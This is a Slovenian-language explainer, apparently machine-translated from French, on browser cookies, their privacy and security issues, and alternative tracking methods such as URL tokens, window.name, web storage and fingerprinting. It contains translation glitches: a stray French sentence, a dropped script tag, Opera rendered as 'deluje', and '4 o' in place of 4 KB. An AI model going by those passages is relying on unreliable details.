Vsako spletno mesto naj bi imelo lastne piškotke, zato eno spletno mesto ne bi smelo imeti možnosti spreminjanja ali ustvarjanja piškotkov, povezanih z drugim spletnim mestom. Varnostna napaka spletnega brskalnika lahko zlonamernim mestom omogoči kršitev tega pravila. Izkoriščanje takšne napake se običajno imenuje navzkrižno kuhanje. Namen takih napadov je lahko kraja ID-ja seje.

Uporabniki naj uporabljajo najnovejše različice spletnih brskalnikov, v katerih so te ranljivosti praktično odpravljene.

Konfliktno stanje med odjemalcem in strežnikom

Uporaba piškotkov lahko povzroči protislovje med stanjem odjemalca in stanjem, shranjenim v piškotku. Če uporabnik pridobi piškotek in klikne na gumb "Nazaj" brskalnika, stanje brskalnika praviloma ni enako kot pred pridobitvijo. Na primer, če je košarica spletne trgovine ustvarjena s pomočjo piškotkov, se vsebina košarice ne more spremeniti, ko se uporabnik vrne v zgodovino brskalnika: če uporabnik pritisne gumb za dodajanje artikla v svojo košarico in klikne »Nazaj ", članek ostane v tem. Morda to ni namen uporabnika, ki zagotovo želi preklicati dodajanje članka. To lahko povzroči nezanesljivost, zmedo in napake. Zato bi se morali spletni razvijalci zavedati te težave in izvajati ukrepe za obvladovanje takšnih situacij.

Potek piškotka

Strokovnjaki za varnost zasebnosti so obstojne piškotke kritizirali, ker niso načrtovani, da potečejo dovolj hitro, kar spletnim mestom omogoča sledenje uporabnikom in sčasoma ustvarjanje njihovega profila. Ta vidik piškotkov je tudi del problema ugrabitve seje, ker se lahko ukradeni trajni piškotek uporabi za lažno predstavljanje uporabnika za daljše časovno obdobje.

Preberite tudi: GAFAM: kdo so? Zakaj so (včasih) tako strašljivi?

Alternative piškotkom

Nekatere operacije, ki jih je mogoče izvesti s piškotki, je mogoče izvesti tudi z drugimi mehanizmi, ki zaobidejo piškotke ali znova ustvarijo izbrisane piškotke, kar povzroča težave z zasebnostjo na enak način (ali včasih še hujše, ker so potem nevidni) kot piškotki.

IP naslov

Uporabnikom je mogoče slediti z naslovom IP računalnika, ki kliče stran. Ta tehnika je na voljo od uvedbe svetovnega spleta, ko se strani naložijo, strežnik zahteva naslov IP računalnika, v katerem je nameščen brskalnik ali proxy, če ni uporabljen noben. Strežnik lahko sledi tem informacijam, ne glede na to, ali so v uporabi piškotki ali ne. Vendar pa so ti naslovi običajno manj zanesljivi pri identifikaciji uporabnika kot piškotki, ker si lahko računalnike in proxyje deli več uporabnikov, isti računalnik pa lahko prejme drug naslov IP v vsaki delovni seji (kot c pogosto velja za telefonske povezave) .

Sledenje po naslovih IP je lahko zanesljivo v nekaterih situacijah, kot so širokopasovne povezave, ki dolgo časa ohranjajo isti naslov IP, dokler je napajanje vklopljeno.

Nekateri sistemi, kot je Tor, so zasnovani tako, da ohranjajo anonimnost interneta in onemogočajo ali nepraktično sledenje po naslovu IP.

URL

Natančnejša tehnika temelji na vdelavi informacij v URL-je. Del URL-ja s poizvedbenim nizom je ena od tehnik, ki se običajno uporablja za ta namen, lahko pa se uporabljajo tudi drugi deli. Tako mehanizem seje Java Serverlet kot PHP uporabljata to metodo, če piškotki niso omogočeni.

Ta metoda vključuje, da spletni strežnik dodaja zahteve nizov povezavam spletne strani, ki jih prenaša, ko so poslane v brskalnik. Ko uporabnik sledi povezavi, brskalnik strežniku vrne priložen niz poizvedbe.

Poizvedbeni nizi, ki se uporabljajo za ta namen, in piškotki so si zelo podobni, oboje pa so informacije, ki jih poljubno izbere strežnik in jih vrne brskalnik. Vendar pa obstaja nekaj razlik: ko je URL, ki vsebuje poizvedbeni niz, ponovno uporabljen, se iste informacije pošljejo strežniku. Na primer, če so uporabniške nastavitve kodirane v poizvedbenem nizu URL-ja in uporabnik pošlje ta URL drugemu uporabniku po e-pošti, bo ta uporabnik prav tako lahko uporabil te nastavitve.

Po drugi strani pa, ko uporabnik dvakrat dostopa do iste strani, ni nobenega zagotovila, da bo obakrat uporabljen isti niz poizvedbe. Na primer, če uporabnik prvič pristane na strani z notranje strani spletnega mesta in drugič pristane na isti strani z zunanje strani, je poizvedbeni niz glede na stran spletnega mesta običajno drugačen, medtem ko so piškotki enaki .

Druge pomanjkljivosti nizov poizvedb so povezane z varnostjo: ohranjanje podatkov, ki identificirajo sejo, v nizih poizvedb omogoča ali poenostavlja napade fiksiranja seje, napade s sklicevanjem na identifikator in druge podvige. Posredovanje ID-jev sej kot piškotkov HTTP je bolj varno.

Skrito polje obrazca

Ena oblika sledenja sejam, ki jo uporablja ASP.NET, je uporaba spletnih obrazcev s skritimi polji. Ta tehnika je zelo podobna uporabi poizvedbenih nizov URL za prenos informacij in ima enake prednosti in slabosti; in če je obrazec obdelan z metodo HTTP GET, postanejo polja dejansko del URL-ja brskalnika, ki ga bo poslal ob oddaji obrazca. Toda večina obrazcev se obdeluje s HTTP POST, zaradi česar se informacije obrazca, vključno s skritimi polji, dodajo kot dodaten vnos, ki ni ne del URL-ja ne piškotka.

Ta pristop ima dve prednosti z vidika sledenja: prvič, sledenje informacijam v izvorni kodi HTML in vnosu POST namesto URL-ja bo povprečnemu uporabniku omogočilo, da se izogne ​​temu sledenju; drugič, informacije o seji se ne kopirajo, ko uporabnik kopira URL (na primer za shranjevanje strani na disk ali pošiljanje po e-pošti).

okno.ime

Vsi običajni spletni brskalniki lahko shranijo precej veliko količino podatkov (2 MB do 32 MB) prek JavaScripta z uporabo lastnosti window.name DOM-a. Ti podatki se lahko uporabljajo namesto sejnih piškotkov in se uporabljajo tudi med domenami. Tehniko je mogoče povezati z objekti JSON za shranjevanje kompleksnega niza spremenljivk seje na strani odjemalca.

Slaba stran je, da ima vsako ločeno okno ali zavihek na začetku prazno window.name; pri brskanju po zavihkih (ki jih odpre uporabnik) to pomeni, da posamično odprti zavihki ne bodo imeli imena okna. Poleg tega se lahko window.name uporablja za sledenje obiskovalcem na različnih spletnih mestih, kar lahko predstavlja pomislek glede zasebnosti.

V nekaterih pogledih je to lahko bolj varno kot piškotki zaradi nevpletenosti strežnika, zaradi česar je neranljiv za omrežne napade piškotkov vohljača. Če pa se sprejmejo posebni ukrepi za zaščito podatkov, so ranljivi za nadaljnje napade, saj so podatki na voljo prek drugih spletnih mest, odprtih v istem oknu.

Preverjanje pristnosti HTTP

Protokol HTTP vključuje osnovne protokole za preverjanje pristnosti dostopa in izvleček za preverjanje pristnosti dostopa, ki omogoča dostop do spletne strani le, če je uporabnik vnesel uporabniško ime in geslo. Če strežnik zahteva potrdilo za dostop do spletne strani, ga brskalnik zahteva od uporabnika in ga brskalnik, ko ga pridobi, shrani in pošlje v vseh nadaljnjih HTTP zahtevah. Te podatke je mogoče uporabiti za sledenje uporabniku.

Lokalni predmet v skupni rabi

Če brskalnik vključuje vtičnik Adobe Flash Player, se lokalne skupne predmete se lahko uporabljajo za enak namen kot piškotki. Lahko so privlačna izbira za spletne razvijalce, ker:

• privzeta omejitev velikosti za lokalni objekt v skupni rabi je 100 KB;
• varnostni pregledi so ločeni od uporabniških pregledov piškotkov (tako da so lokalni predmeti v skupni rabi lahko dovoljeni, ko piškotki niso).

Ta zadnja točka, ki razlikuje politiko upravljanja piškotkov od politike Adobejevih lokalnih objektov v skupni rabi postavlja vprašanja v zvezi z upravljanjem uporabnikovih nastavitev zasebnosti s strani uporabnika: zavedati se mora, da njegovo upravljanje piškotkov nima vpliva na upravljanje lokalnih objektov v skupni rabi in obratno.

Druga kritika tega sistema je, da ga je mogoče uporabljati samo prek vtičnika Adobe Flash Player, ki je zaščiten in ni spletni standard.

Vztrajnost na strani odjemalca

Nekateri spletni brskalniki podpirajo mehanizem vztrajnosti, ki temelji na skriptih, ki strani omogoča lokalno shranjevanje informacij za kasnejšo uporabo. Internet Explorer, na primer, podpira trajne informacije v zgodovini brskalnika, zaznamkih, v formatu, shranjenem v XML, ali neposredno s spletno stranjo, shranjeno na disk. Za Microsoft Internet Explorer 5 je prek vedenja DHTML na voljo metoda uporabniških podatkov.

W3C je v HTML 5 uvedel nov JavaScript API za shranjevanje podatkov na strani odjemalca, imenovan Spletna shramba, katerega namen je bil trajno nadomestiti piškotke. Podoben je piškotkom, vendar z močno izboljšano zmogljivostjo in brez shranjevanja informacij v glavi zahtev HTTP. API omogoča dve vrsti spletnega shranjevanja: localstorage in sessionstorage, podobno kot trajni piškotki in sejni piškotki (le da piškotki seje potečejo, ko je brskalnik zaprt, medtem ko shranjevanje seje potečejo, ko je zavihek zaprt). Spletno shranjevanje podpirajo Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 in Opera 10.50.

Drugačen mehanizem običajno temelji na predpomnjenju brskalnika (v pomnilniku in ne na osveževanju) z uporabo programov JavaScript na spletnih straneh. 

Na primer, stran lahko vsebuje oznako . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

Na tej točki program ostane v predpomnilniku in obiskana stran se ne naloži drugič. Posledično, če program vsebuje globalno spremenljivko (na primer var id = 3243242;), ta identifikator ostane veljaven in ga lahko izkoristi druga koda JavaScript, ko se stran ponovno naloži ali ko se naloži stran, ki povezuje program. 

Glavna pomanjkljivost te metode je, da mora biti globalna spremenljivka JavaScript statična, kar pomeni, da je ni mogoče spremeniti ali izbrisati kot piškotek.

prstni odtis spletnega brskalnika

Prstni odtis brskalnika je informacija, zbrana o konfiguracijskih nastavitvah brskalnika za namene identifikacije. Te prstne odtise je mogoče uporabiti za popolno ali delno identifikacijo internetnega uporabnika ali naprave, tudi če so piškotki onemogočeni.

Osnovne informacije o konfiguraciji spletnega brskalnika že dolgo zbirajo storitve za občinstvo spletnih mest z namenom natančnega merjenja človeškega spletnega prometa in odkrivanja različnih oblik goljufij s kliki. S pomočjo skriptnih jezikov na strani odjemalca je zbiranje informacij veliko natančnejše zdaj možno.

Pretvorba teh informacij v bitni niz ustvari prstni odtis naprave. Leta 2010 je Fundacija Electronic Frontier (EFF) izmerila entropijo prstnega odtisa brskalnika najmanj Bitov 18,1, in to preden je napredek pri prstnih odtisih na platnu tej entropiji dodal 5,7 bitov.

Piškoti na kratko

Piškotki so majhne besedilne datoteke, ki jih spletni brskalnik shrani na trdi disk obiskovalca spletnega mesta in se (med drugim) uporabljajo za beleženje informacij o obiskovalcu ali njegovem potovanju po spletnem mestu. Spletni skrbnik lahko tako prepozna navade obiskovalca in individualizira predstavitev svoje strani za vsakega obiskovalca; piškotki nato omogočajo, da si zapomnijo, koliko člankov je treba prikazati na domači strani, ali celo ohranijo poverilnice za prijavo za katero koli zasebno stran: ko se obiskovalec vrne na spletno mesto, mu ni več treba vtipkati svojega imena in gesla za prepoznati, saj se samodejno preberejo v piškotku.

Piškotek ima omejeno življenjsko dobo, ki jo določi oblikovalec spletnega mesta. Prav tako lahko potečejo ob koncu seje na spletnem mestu, kar ustreza zaprtju brskalnika. Piškotki se pogosto uporabljajo, da obiskovalcem olajšajo življenje in jim ponudijo ustreznejše informacije. Posebne tehnike pa omogočajo spremljanje obiskovalca na več mestih in s tem zbiranje in navzkrižno preverjanje zelo obsežnih informacij o njegovih navadah. Ta metoda je uporabi piškotkov prinesla sloves nadzorne tehnike, ki krši zasebnost obiskovalcev, kar na žalost ustreza realnosti v mnogih primerih uporabe iz netehničnih razlogov ali neupoštevanja pričakovanj uporabnikov.

Kot odgovor na te upravičene strahove HTML 5 uvaja nov API JavaScript za shranjevanje podatkov na strani odjemalca, imenovan spletno shranjevanje, ki je veliko bolj varen in z večjo zmogljivostjo, katerega cilj je nadomestiti piškotke.

Shranjevanje piškotkov

V nekaterih brskalnikih je piškotek enostavno urejati, za ročno spreminjanje njegovih vrednosti zadostuje preprost urejevalnik besedila, kot je Beležnica.

Piškotki se shranjujejo različno glede na brskalnik:

• Microsoft Internet Explorer shrani vsak piškotek v drugo datoteko;
• Mozilla Firefox shrani vse svoje piškotke v eno datoteko;
• deluje shrani vse svoje piškotke v eno datoteko in jih šifrira (ni mogoče jih spremeniti, razen v možnostih programske opreme);
• Apple Safari shrani vse svoje piškotke v eno datoteko s pripono .plist. Spreminjanje je možno, vendar ni zelo enostavno, razen če greste skozi možnosti programske opreme.

Za podporo so potrebni brskalniki najmanj :

• 300 hkratnih piškotkov;
• 4 o na piškotek;
• 20 piškotkov na gostitelja ali domeno.